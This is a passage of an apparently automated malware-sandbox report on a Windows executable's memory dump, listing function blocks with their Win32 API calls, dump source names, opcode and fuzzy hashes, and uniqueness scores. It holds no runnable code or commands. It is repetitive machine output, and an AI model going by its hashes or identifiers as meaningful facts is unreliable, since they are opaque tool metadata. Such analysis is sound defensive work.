                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Resource$ActiveEnable$EnabledFindHookLoadLockUnhookWindows
                                      • String ID:
                                      • API String ID: 4081536698-0
                                      • Opcode ID: 259f7cae2ea04aba6dd8bb5c14475dd7a30ddecdf17f1a89bf407545324321d2
                                      • Instruction ID: 40a5a33dd64d3191a8bb28d34adccfd1df6f60c33436460b911c2a3c0f0c6a41
                                      • Opcode Fuzzy Hash: 259f7cae2ea04aba6dd8bb5c14475dd7a30ddecdf17f1a89bf407545324321d2
                                      • Instruction Fuzzy Hash: 97418070900B049FEB21AF65C84ABBFB7B5BF44B15F14051FE502A22A1CF799E01CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00449B29
                                      • lstrcpynA.KERNEL32(?,?,00000104), ref: 00449B38
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00449B6C
                                      • CharUpperA.USER32(?), ref: 00449B7D
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00449B93
                                      • FindClose.KERNEL32(00000000), ref: 00449B9F
                                      • lstrcpyA.KERNEL32(?,?), ref: 00449BAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Find$CharCloseFileFirstFullInformationNamePathUpperVolumelstrcpylstrcpyn
                                      • String ID:
                                      • API String ID: 403452862-0
                                      • Opcode ID: fdffec50d54b9f98fd4023632cd798f63d9708f17defb34e266e528e058c5156
                                      • Instruction ID: df522f99a8fbe858ad1d724cfd319ddb3506c91dc17946f1ea3aa9e0e94fa69f
                                      • Opcode Fuzzy Hash: fdffec50d54b9f98fd4023632cd798f63d9708f17defb34e266e528e058c5156
                                      • Instruction Fuzzy Hash: 78219A71900118BBDB109FA1EC48EEF7FBCEF09361F008166F919E21A1D7349A41DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: pgD
                                      • API String ID: 0-4038969771
                                      • Opcode ID: debd211581e3ed6ea4f63942e477a11acc8f5098c0b24d4d48a0bb6597614c59
                                      • Instruction ID: 1b3c8f9af7dc373a7ec512597165eec57e6c3f98006626f16f1fde06af5fa42c
                                      • Opcode Fuzzy Hash: debd211581e3ed6ea4f63942e477a11acc8f5098c0b24d4d48a0bb6597614c59
                                      • Instruction Fuzzy Hash: 8DF03631B00119AACF016F71EC04AAE7B68BF05345F94C026FC56D5061DB38E656DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00446FC7: GetWindowLongA.USER32 ref: 00446FD3
                                      • GetKeyState.USER32(00000010), ref: 004463AB
                                      • GetKeyState.USER32(00000011), ref: 004463B4
                                      • GetKeyState.USER32(00000012), ref: 004463BD
                                      • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004463D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: State$LongMessageSendWindow
                                      • String ID:
                                      • API String ID: 1063413437-0
                                      • Opcode ID: 36c6455eb7a929323c10a8c7e010dfdc5ff7aff6574de684afa9e9876731a51b
                                      • Instruction ID: 329bc380b55e62f03e32e536339e9899343184e6918abae6087740aafa556900
                                      • Opcode Fuzzy Hash: 36c6455eb7a929323c10a8c7e010dfdc5ff7aff6574de684afa9e9876731a51b
                                      • Instruction Fuzzy Hash: D7F027363407ED36F6203A652C82FD905154F83BD8F02043BFB01FA1D189D9C81242BA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLocalTime.KERNEL32(00443781), ref: 00436029
                                      • GetSystemTime.KERNEL32(?), ref: 00436033
                                      • GetTimeZoneInformation.KERNEL32(?), ref: 00436088
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Time$InformationLocalSystemZone
                                      • String ID:
                                      • API String ID: 2475273158-0
                                      • Opcode ID: cd8ed818bcc0a11e0df919fdb1a6a97bda1cc77cf82515dea90e659b4b19ca6d
                                      • Instruction ID: c0fff5b110e1fd32414f850ff711d9fe3a1867d40226d8d52fe9fc2d0d11f783
                                      • Opcode Fuzzy Hash: cd8ed818bcc0a11e0df919fdb1a6a97bda1cc77cf82515dea90e659b4b19ca6d
                                      • Instruction Fuzzy Hash: 83217F69800107F5CF28EB99D8456FF77B8AF08720F408152F846E62A0E7798CC6C768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetKeyState.USER32(00000010), ref: 00448BEB
                                      • GetKeyState.USER32(00000011), ref: 00448BF4
                                      • GetKeyState.USER32(00000012), ref: 00448BFD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: State
                                      • String ID:
                                      • API String ID: 1649606143-0
                                      • Opcode ID: e5121532fc5b8ca30ad2d5bab9d043c3a9b95d3e24dfca738b86abd325363723
                                      • Instruction ID: 15828a74bbdf10c9f3131883b5ebf2efc856b93431cbea4e1f19d1a1d6ff8ec0
                                      • Opcode Fuzzy Hash: e5121532fc5b8ca30ad2d5bab9d043c3a9b95d3e24dfca738b86abd325363723
                                      • Instruction Fuzzy Hash: D5E02238502349DDFA0192C08A80FDD26905B027D0F01886FEB40AB0A1DEA9C8878BBD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: 5
                                      • API String ID: 0-2226203566
                                      • Opcode ID: 3448bbbe8c4a62bde098acfca4b384a754bc9e04edbcbde863c4671914d13f66
                                      • Instruction ID: 0ad48b4ef0d56743afb18a3313ade22d400fd403b42775f519bc1c8decf0088d
                                      • Opcode Fuzzy Hash: 3448bbbe8c4a62bde098acfca4b384a754bc9e04edbcbde863c4671914d13f66
                                      • Instruction Fuzzy Hash: DE43E970A04229DFCB14CF58D991BEDBBB2FF89304F54819AD549AB344D778AA81CF48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: ,QB$x
                                      • API String ID: 0-1837767897
                                      • Opcode ID: 24a25d080854cebc23731b57592ca03515e6085f891a750c28185417074c38ee
                                      • Instruction ID: 6457d411704a97860cb9f0208915170025c844ff7237e56403c8cbd7d7a53c84
                                      • Opcode Fuzzy Hash: 24a25d080854cebc23731b57592ca03515e6085f891a750c28185417074c38ee
                                      • Instruction Fuzzy Hash: 0292B274610609DFCB48CF19C090A997BB2FF883A4F60C199E8498F756D775EA86CF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: $w
                                      • API String ID: 0-1564209528
                                      • Opcode ID: ca78ee85deb9cac06e8d29a47a06e25c92e6372e5d26db3cf25b85dd7cb782fa
                                      • Instruction ID: 9c6bd09c3dc01a9c4a6bb7b7ea9f051cec7e3e0918ca2780a25d1e14d3737d6d
                                      • Opcode Fuzzy Hash: ca78ee85deb9cac06e8d29a47a06e25c92e6372e5d26db3cf25b85dd7cb782fa
                                      • Instruction Fuzzy Hash: 0AF17B75D00218EBDF14CF95C885BEEB7B5BF48316F10815AE815AB282D3389E89CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetVersion.KERNEL32(00000007,00000007), ref: 004458D0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 66b6a670cb142e3c6b9bd57ff313a036e6fb94a2052bf28ffdcf3171f449aa6f
                                      • Instruction ID: 65a843e4a36731168bd510110840921fc5939178a50bf879914c86ce0199a51a
                                      • Opcode Fuzzy Hash: 66b6a670cb142e3c6b9bd57ff313a036e6fb94a2052bf28ffdcf3171f449aa6f
                                      • Instruction Fuzzy Hash: 34E18070504619EBFF14DF25CC81BBE77A9EF04315F10851AF806AB252DB38EA11DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 00401601
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1705453755-0
                                      • Opcode ID: 2e4435ec8cb92b14ba298236c43022dea1d59fab5ec864284abea349558b6df3
                                      • Instruction ID: a1f0c960b6caf07f2b24b5b4e73555e3db78e4c1d753d0821525525e8a879c6e
                                      • Opcode Fuzzy Hash: 2e4435ec8cb92b14ba298236c43022dea1d59fab5ec864284abea349558b6df3
                                      • Instruction Fuzzy Hash: 1C212CB5A00208EFCB04DF99C981FDEBBB8FB48710F14826EE51567391DB35A904CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • IsIconic.USER32(00000065), ref: 0041179E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Iconic
                                      • String ID:
                                      • API String ID: 110040809-0
                                      • Opcode ID: 30a3a02a6de36a7ed3534b42e297d82261a98aa294d707722ee1a35c70f91ab7
                                      • Instruction ID: 106089efdd24db456ed4fc60651d0c51017334315ee16e6feb6ebbf04f49d60b
                                      • Opcode Fuzzy Hash: 30a3a02a6de36a7ed3534b42e297d82261a98aa294d707722ee1a35c70f91ab7
                                      • Instruction Fuzzy Hash: D4C08C7092930CEB8708CF98E800C2DB7BCEB0A311B0002DCFC0883311CA32EE018A98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 443d5c6cb482ed06d9f4bbad3a02002b082b5273cb31fc597dafed458d935dac
                                      • Instruction ID: c8e6cd2a4d5b05e228c73503b32acf004b36f7362ef9edda1d03af0c03d7986d
                                      • Opcode Fuzzy Hash: 443d5c6cb482ed06d9f4bbad3a02002b082b5273cb31fc597dafed458d935dac
                                      • Instruction Fuzzy Hash: 06C1F974E0111ADFCF18CF98D5909EEB7B2FF88304F6081AAD815AB354DB34AA51CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BAE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 82228b248fedbb63a0de0474368e0b710a73320b2962e12bac4efddc1f018a90
                                      • Instruction ID: 4c5b341102615fa15da218ef4dcb224afba398636bf2d5e796b8e9dc8012b0a4
                                      • Opcode Fuzzy Hash: 82228b248fedbb63a0de0474368e0b710a73320b2962e12bac4efddc1f018a90
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e926ed604d9e191934c463cc8a724f5b803a843884ff08d5aa6d628240c8d169
                                      • Instruction ID: 5d40f9fba4fe9fb964d01ac75df67053264046662bb9e2fca420d3ae8d8402a7
                                      • Opcode Fuzzy Hash: e926ed604d9e191934c463cc8a724f5b803a843884ff08d5aa6d628240c8d169
                                      • Instruction Fuzzy Hash: B1B20774A04229DFCB24CF18C994BE9BBB1BF89304F5481E9D84D5B355DB31AA81CF89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a7ca3772bf5aeb17c4cb3c7fc5d04b04e01758f3747f967b9e31fc8169638d7
                                      • Instruction ID: 80db94ea789d0c1572ba80d814a45ff670c4fc6db6e887e9da4f2ebd443136f8
                                      • Opcode Fuzzy Hash: 3a7ca3772bf5aeb17c4cb3c7fc5d04b04e01758f3747f967b9e31fc8169638d7
                                      • Instruction Fuzzy Hash: EC722B75A00219EFDB14CF58D490BAEBBB1FF88354F548159E8499B345D738EA82CF88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8efef38f2f19f72345f251c438f43e8382365221a4e0fafc569efd01ce67b30
                                      • Instruction ID: b658bbe8229227963f66d378c01990dd495a7066d05840d785cf99055efb143f
                                      • Opcode Fuzzy Hash: a8efef38f2f19f72345f251c438f43e8382365221a4e0fafc569efd01ce67b30
                                      • Instruction Fuzzy Hash: 2E520874A00219DFCB48CF19C490AA97BB2FF88354F55C199E8499F346D735EA82CF88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b5c83e6e52f024313b3d1d3120d774ad0a39b52b6105820f12d605ac37cb654
                                      • Instruction ID: 14d4586820766c22914f5b71352e3cbb0b589cd8df2e97ecdfffffb549f6c4a6
                                      • Opcode Fuzzy Hash: 8b5c83e6e52f024313b3d1d3120d774ad0a39b52b6105820f12d605ac37cb654
                                      • Instruction Fuzzy Hash: 46E1C574A04129DFCB18CF68D990AEDBBB2BF88304F5482D9D44DA7345D734AA91CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e63966cc04ab8a582fb985b9bd39c1c310b45d08bbc8e75157c54a70ba5a8e7
                                      • Instruction ID: 66cd36100c5f7beb12958815fc8053b456a54652d280ebfe73ecb5bdbc038178
                                      • Opcode Fuzzy Hash: 3e63966cc04ab8a582fb985b9bd39c1c310b45d08bbc8e75157c54a70ba5a8e7
                                      • Instruction Fuzzy Hash: 1FD1B474A04229CFCB18CF69D894AEDBBB2BF89305F548299D44DAB345D734AE81CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                      • Instruction ID: 57db28302b80fa3a9d1eb4d9ea35108957551f0f73d8ba46b6bb28a3543bda86
                                      • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                      • Instruction Fuzzy Hash: 7AB18B75A0024ADFDB15CF04C5D0AA9FBA1BF58318F24C29EC85A5B382C775EE42CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
